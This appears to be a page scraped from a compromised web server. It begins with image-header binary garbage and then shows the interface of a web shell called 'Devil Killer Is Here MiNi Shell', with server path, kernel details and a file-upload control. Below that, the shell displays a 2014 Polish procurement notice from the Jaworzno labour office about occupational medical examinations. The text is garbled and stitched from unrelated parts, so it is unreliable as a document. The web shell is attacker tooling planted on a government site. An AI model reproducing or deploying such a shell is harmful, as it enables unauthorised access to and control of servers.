JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140108/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140108/4143-N-2014.html

<p class="kh_header"><b>Jaworzno: Przedmiotem zamówienia jest przeprowadzanie badań profilaktycznych pracowników Powiatowego Urzędu Pracy w Jaworznie oraz osób bezrobotnych i poszukujących pracy niepozostających w zatrudnieniu kierowanych przez Powiatowy Urząd Pracy w Jaworznie.</b><br>
<b>Numer ogłoszenia: 4143 - 2014; data zamieszczenia: 08.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Jaworznie , ul. Północna 9B, 43-600 Jaworzno, woj. śląskie, tel. 032 6181924, faks 032 6181901.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest przeprowadzanie badań profilaktycznych pracowników Powiatowego Urzędu Pracy w Jaworznie oraz osób bezrobotnych i poszukujących pracy niepozostających w zatrudnieniu kierowanych przez Powiatowy Urząd Pracy w Jaworznie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzanie badań profilaktycznych pracowników Powiatowego Urzędu Pracy w Jaworznie oraz osób bezrobotnych i poszukujących pracy niepozostających w zatrudnieniu kierowanych przez Powiatowy Urząd Pracy w Jaworznie. Zamawiający podzielił zamówienie na dwa zakresy - zakres I i zakres II.

Zakres I: Przeprowadzanie badań profilaktycznych pracowników Powiatowego Urzędu Pracy w Jaworznie.
Zakres II: Przeprowadzanie badań profilaktycznych oraz sanitarno - epidemiologicznych z zakresu medycyny pracy osób bezrobotnych i poszukujących pracy niepozostających w zatrudnieniu kierowanych przez Powiatowy Urząd Pracy w Jaworznie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełniania warunków udziału w postępowaniu, o których mowa w tym pkt należy złożyć oświadczenie, zgodne z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełniania warunków udziału w postępowaniu, o których mowa w tym pkt należy złożyć oświadczenie, zgodne z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełniania warunków udziału w postępowaniu, o których mowa w tym pkt należy złożyć oświadczenie, zgodne z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełniania warunków udziału w postępowaniu, o których mowa w tym pkt należy złożyć oświadczenie, zgodne z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu oceny spełniania warunków udziału w postępowaniu, o których mowa w tym pkt należy złożyć oświadczenie, zgodne z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony formularz ofertowy dot. odpowiednio zakresu I ( załącznik nr 1 do SIWZ) i zakresu II (załącznik nr 2 do SIWZ). - stanowiący 1 stronę oferty.
6.2	W celu potwierdzenia, że Wykonawca nie podlega wykluczeniu na podstawie art. 24 ust.2 pkt 5 ustawy Prawo zamówień publicznych zawartych w rozdziale 5 ust. 3 SIWZ Zamawiający żąda od Wykonawcy złożenia wraz z ofertą, listy podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), o której mowa w art. 24 ust. 2 pkt 5 ustawy - Prawo zamówień publicznych, albo informacji o tym, że nie należy do grupy kapitałowej. (załącznik nr 5 do SIWZ.) W przypadku składania oferty przez podmioty wspólnie ubiegające się o zamówienie w/wym. dokumenty składa  każdy z Wykonawców.  Oferta powinna być podpisana przez Wykonawcę lub przez umocowanego przedstawiciela Wykonawcy, upoważnionego do podejmowania zobowiązań w imieniu Wykonawcy zgodnie z wpisem o reprezentacji w stosownym dokumencie uprawniającym do występowania w obrocie prawnym lub udzielonym pełnomocnictwem. Oryginalne lub poświadczone notarialnie pełnomocnictwo winno być dołączone do oferty, o ile nie wynika z innych dokumentów załączonych przez Wykonawcę.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami podanymi poniżej:
1) zmiana wynagrodzenia Wykonawcy:
- wynagrodzenie Wykonawcy może ulec zmianie, w przypadku ustawowej zmiany stawki podatku VAT,
2) zmiana podwykonawcy:
- dopuszcza się zmianę wskazanego podwykonawcy lub wprowadzenie podwykonawcy w zakresie nieprzewidzianym w złożonej ofercie; w przypadku, gdy podwykonawca udostępnił Wykonawcy swoje zasoby w celu wykazania spełniania warunków udziału w niniejszym postępowaniu, nowy podwykonawca musi spełniać podane w SIWZ wymogi w takim samym zakresie, co poprzedni podwykonawca.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-jaworzno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Jaworznie, ul. Północna 9b, 43-600 Jaworzno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.01.2014 godzina 08:00, miejsce: 1. Ofertę należy złożyć w siedzibie Powiatowego Urzędu Pracy w Jaworznie przy ulicy Północnej 9b, I  piętro, pokój nr 124,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakres I: Przeprowadzanie badań profilaktycznych pracowników Powiatowego Urzędu Pracy w Jaworznie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zakres I zamówienia obejmuje przeprowadzenie:
a) badań profilaktycznych: wstępnych, okresowych pracowników tut. Urzędu lub osób fizycznych wykonujących pracę na innej podstawie niż stosunek pracy w tut. Urzędzie, w tym badanie przez lekarza medycyny pracy, lekarza okulistę, morfologia krwi, odczyn Ob oraz dodatkowe konsultacje specjalistyczne wynikające ze wskazań lekarza prowadzącego badania profilaktyczne, a także wydanie stosownego zaświadczenia lekarskiego - ok.45 osób;
b) badań profilaktycznych: kontrolnych pracowników tut. Urzędu lub osób fizycznych wykonujących pracę  na innej podstawie niż stosunek pracy w tut. Urzędzie, w tym badanie przez lekarza medycyny pracy, dodatkowe konsultacje specjalistyczne wynikające ze wskazań lekarza prowadzącego badania profilaktyczne oraz wydanie stosownego zaświadczenia lekarskiego - ok 8 osób;
c) dodatkowych badań okulistycznych oraz wydanie stosownego zaświadczenia lekarskiego [pod pojęciem dodatkowe badania okulistyczne Zamawiający rozumie badania okulistyczne nie wchodzące w skład badań wstępnych, okresowych oraz kontrolnych. Konieczność ich przeprowadzenia może wystąpić w trakcie ważności ww. badań profilaktycznych (np. stwierdzenie konieczności zastosowania lub zmiany okularów korekcyjnych)] - ok. 5 osób;
d) badań zgodnie z art. 15 ustawy z dnia 27 sierpnia 1997r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (tj. Dz.U. z 2011r. Nr 127, poz. 721 z późn. zm.) oraz wydanie stosownego zaświadczenia lekarskiego - ok. 2 osób.
2) Ilość osób kierowanych na badania:  Zamawiający planuje skierować maksymalnie 60 osób (pracownicy tut. Urzędu zatrudnieni są na stanowiskach: pracownik biurowy, sprzątaczka, kierowca samochodu osobowego, robotnik gospodarczy).
3) Podane szacunkowe ilości poszczególnych badań mogą ulec zmianie poprzez zwiększenie lub zmniejszenie w zależności od potrzeb Zamawiającego. Zmniejszenie lub zwiększenie ilości badań nie będzie stanowić zmiany umowy. Zamawiający dopuszcza realizację przedmiotu zamówienia w innych ilościach z zastrzeżeniem, iż całkowita wartość zrealizowanego zamówienia nie może przekoczyć maksymalnej wartości umowy.
4) Ilość osób skierowanych na badania w okresie  trwania umowy może się zwiększyć lub zmniejszyć a ich ilość w okresie realizacji umowy będzie różna i zależna od potrzeb Zamawiającego, na co  Wykonawca wyraża zgodę i nie będzie dochodził roszczeń z tytułu zmian  ilościowych w trakcie realizacji umowy. Zamawiający nie gwarantuje w żaden sposób, że środki finansowe oraz podane ilości zostaną osiągnięte w okresie realizacji umowy. Jeżeli całkowita wartość zrealizowanego zamówienia będzie niższa od ceny ofertowej brutto, to Wykonawcy nie przysługuje wynagrodzenie za niezrealizowaną część usługi.
5) Badania powinny być przeprowadzane zgodnie z brzmieniem przepisów ustawy z dnia 27 czerwca 1997r. o służbie medycyny pracy (Dz. U. z 2004r. Nr 125, poz. 1317 z późn. zm.), Rozporządzenia Ministra Zdrowia z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. Nr 69, poz. 332 z późn. zm.), prowadzenie rejestracji oraz dokumentacji medycznej zgodnie z brzmieniem Rozporządzenia Ministra Zdrowia z dnia 29 lipca 2010r. w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia i przechowywania oraz wzorów stosowanych dokumentów (Dz. U. nr 149 poz. 1002), oraz pozostałych obowiązujących przepisów prawnych.
6) Miejsce wykonywania usług: miasto Jaworzno.
7) Termin wykonania zamówienia: od dnia podpisania umowy do 31.12.2014r., na bieżąco, w zależności od potrzeb Zamawiającego, niezwłocznie po zgłoszeniu się osoby posiadającej skierowanie wydane przez Zamawiającego.
8) Wykonawca musi dysponować odpowiednią bazą lokalową gwarantującą pełen zakres usług medycznych, będących przedmiotem niniejszego zamówienia. Pomieszczenia muszą odpowiadać wymogom pod względem fachowym i sanitarnym określonym w Rozporządzeniu Ministra Zdrowia z dnia 26 czerwca 2012 r. w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą ( Dz. U. poz. 739).
9) Stosowne badanie musi być przeprowadzone przez lekarza medycyny pracy, lekarza uprawnionego do badań lekarskich osób kierującymi pojazdami lub psychologa w zależności od rodzaju badania wymienionego w skierowaniu na badania. 
10) Wykonawca powinien zapewnić możliwość bieżącej (codziennej) realizacji pełnego zakresu badań (od poniedziałku do piątku) w godzinach od 7.00 do 15.00. 
11) Badania lekarskie będą wykonywane na podstawie indywidualnego skierowania wydanego przez Zamawiającego
12) W wyniku przeprowadzonego badania lekarz przekazuje osobie badanej 2 egzemplarze stosownego zaświadczenia lekarskiego (orzeczenia), z których jeden egzemplarz przeznaczony będzie dla Zamawiającego.
13) Badanie musi być zakończone wydaniem, do 5 dni od dnia zgłoszenia się skierowanego na badanie, stosownego zaświadczenia lekarskiego.
14) Wykonawca będzie pobierał należności za wykonanie badania zgodnie ze złożonym formularzem ofertowym.
15) Zamawiający będzie kierował osoby do Wykonawcy od poniedziałku do piątku w ustalonych godzinach..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakres II: Przeprowadzanie badań profilaktycznych oraz sanitarno - epidemiologicznych z zakresu medycyny pracy osób bezrobotnych i poszukujących pracy niepozostających w zatrudnieniu kierowanych przez Powiatowy Urząd Pracy w Jaworznie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Zakres II zamówienia obejmuje wykonywanie badań lekarskich w trybie art. 2 ust.1 pkt 12 lit.d, art. 2 ust. 3, art.40 ust.5 i art.108 ust.1 pkt 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (tj. Dz. U. z 2013 r. poz. 674 z późn. zm.).
Świadczenia zdrowotne mają obejmować badania profilaktyczne oraz sanitarno-epidemiologiczne, specjalistyczne badania lekarskie w tym psychologiczne badania lekarskie oraz wydanie odpowiednich zaświadczeń lekarskich dla osób bezrobotnych i poszukujących pracy niepozostających w zatrudnieniu, w tym osób niepełnosprawnych, figurujących w ewidencji Powiatowego Urzędu Pracy w Jaworznie mających na celu:
a) stwierdzenie zdolności do wykonywania pracy, odbywania stażu, wykonywania prac społecznie użytecznych,
b) stwierdzenie możliwości uczestnictwa w szkoleniu
c) stwierdzenie możliwości uczestnictwa w przygotowaniu zawodowym dorosłych,
d) określenie szczególnych predyspozycji psychofizycznych wymaganych do wykonywania zawodu.
2) Miejsce wykonywania badań: miasto Jaworzno, w uzasadnionych przypadkach dopuszcza się możliwość przeprowadzenia badań poza terenem miasta Jaworzna. W przypadku konieczności skierowania przez Wykonawcę osób bezrobotnych lub poszukujących pracy niepozostających w zatrudnieniu na badania specjalistyczne w innej miejscowości niż Jaworzno, Wykonawca zobowiązuje się wybrać w tym celu ośrodek położony najbliżej miasta Jaworzno.
3) Termin wykonania zamówienia: od dnia podpisania umowy do 31.12.2014r., na bieżąco, w zależności od potrzeb zamawiającego, niezwłocznie po zgłoszeniu się osoby posiadającej skierowanie wydane przez Zamawiającego.
4) Ilość osób kierowanych na badania: Ilość osób kierowanych na badania jest uzależniona od ilości przyznanych środków na aktywizację zawodową i obowiązujących przepisów oraz w zależności od ilości organizowanych szkoleń, staży, przygotowań zawodowych dorosłych, prac społecznie użytecznych. Zamawiający planuje skierować maksymalnie następującą ilość osób:
1.Badania stwierdzające zdolność do wykonywania pracy, odbywania stażu, wykonywania prac społecznie użytecznych - 635 osób,
a) Badania stwierdzające zdolność do wykonywania pracy, odbywania stażu, wykonywania prac społecznie użytecznych z  badaniem sanitarno - epidemiologicznym wraz z wpisem do książeczki zdrowia (badanie wstępne profilaktyczne + badanie kału na nosicielstwo + orzeczenie do celów sanitarno - epidemiologicznych + wpis do książeczki sanepidowskiej) - 115 osób,
2. Badania stwierdzające możliwość uczestnictwa w szkoleniu, (250 osób)obejmujące:
a) Stwierdzenie zdolności do kierowania pojazdami - prawo jazdy kategorii: 
B, B1,T, B+E, C, C1, D, D1, C+E, D+E, C1+E, D1+E - 20 osób, 
b) Badania kandydatów na instruktora nauki jazdy - 2 osoby,
c) Badania kierowców - kwalifikacja wstępna - 6osób,
d) Badania psychologiczne operatorów wózków jezdniowych, w tym z napędem silnikowym - 60 osób,
e) Badania do pracy na wysokości  powyżej 3 metrów - 2 osoby,
f) Badania stwierdzające możliwość uczestnictwa w szkoleniu: drwale, operatorzy pił - 2 osoby,
g) Badania stwierdzające możliwość uczestnictwa w szkoleniu obsługa maszyn i innych urządzeń do robót ziemnych, budowlanych i drogowych, sprzętu ciężkiego ( np. koparki, koparko - ładowarki, walca) - 15 osób
h) Badania stwierdzające możliwość uczestnictwa w szkoleniu: spawanie - różne kategorie - 50 osób,
i) Badania sanitarno - epidemiologiczne wraz z wpisem do książeczki zdrowia (badanie wstępne profilaktyczne + badanie kału na nosicielstwo + orzeczenie do celów sanitarno - epidemiologicznych + wpis do książeczki sanepidowskiej) - 46 osób,
j) Badania stwierdzające możliwość uczestnictwa w innych szkoleniach nie wymagających specjalistycznych badań (np. uprawnienia elektryczne SEP, palacz centralnego ogrzewania, przewóz materiałów niebezpiecznych, monter instalacji wodnych i kanalizacyjnych, gazowych i centralnego ogrzewania i inne) - 47 osób,
3.Specjalistyczne badania psychologiczne mające na celu określenie predyspozycji psychofizycznych wymaganych do wykonywania zawodu -2 osoby,
4. Badania stwierdzające możliwość uczestnictwa w przygotowaniu zawodowym dorosłych z  badaniem sanitarno - epidemiologicznymi wpisem do książeczki zdrowia (badanie wstępne profilaktyczne + badanie kału na nosicielstwo + orzeczenie do celów sanitarno - epidemiologicznych + wpis do książeczki sanepidowskiej) - 1 osoba.

5) Podane szacunkowe ilości poszczególnych badań mogą ulec zmianie poprzez zwiększenie lub zmniejszenie w zależności od potrzeb Zamawiającego. Zmniejszenie lub zwiększenie ilości badań nie będzie stanowić zmiany umowy. Zamawiający dopuszcza realizację przedmiotu zamówienia w innych ilościach z zastrzeżeniem, iż całkowita wartość zrealizowanego zamówienia nie może przekoczyć maksymalnej wartości umowy.
6) Ilość osób skierowanych na badania w okresie  trwania umowy może się zwiększyć lub zmniejszyć a ich ilość w okresie realizacji umowy będzie różna i zależna od potrzeb Zamawiającego, na co  Wykonawca wyraża zgodę i nie będzie dochodził roszczeń z tytułu zmian  ilościowych w trakcie realizacji umowy. Zamawiający nie gwarantuje w żaden sposób, że środki finansowe oraz podane ilości zostaną osiągnięte w okresie realizacji umowy. Jeżeli całkowita wartość zrealizowanego zamówienia będzie niższa od ceny ofertowej brutto, to Wykonawcy nie przysługuje wynagrodzenie za niezrealizowaną część usługi.
7) Badania powinny być przeprowadzane zgodnie z brzmieniem przepisów ustawy z dnia 27 czerwca 1997r. o służbie medycyny pracy (Dz. U. z 2004r. Nr 125, poz. 1317 z późn. zm.), Rozporządzenia Ministra Zdrowia z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie Pracy (Dz. U. Nr 69, poz. 332 z późn. zm.), prowadzenie rejestracji oraz dokumentacji medycznej zgodnie z brzmieniem Rozporządzenia Ministra Zdrowia z dnia 29 lipca 2010r.  w sprawie rodzajów dokumentacji medycznej służby medycyny pracy, sposobu jej prowadzenia                        i przechowywania oraz wzorów stosowanych dokumentów (Dz. U. nr 149 poz. 1002), oraz pozostałych obowiązujących przepisów prawnych.
8) Wykonawca musi dysponować odpowiednią bazą lokalową gwarantującą pełen zakres usług medycznych, będących przedmiotem niniejszego zamówienia. Pomieszczenia muszą odpowiadać wymogom pod względem fachowym i sanitarnym określonym w Rozporządzeniu Ministra Zdrowia z dnia 26 czerwca 2012 r. w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą ( Dz. U. poz. 739).
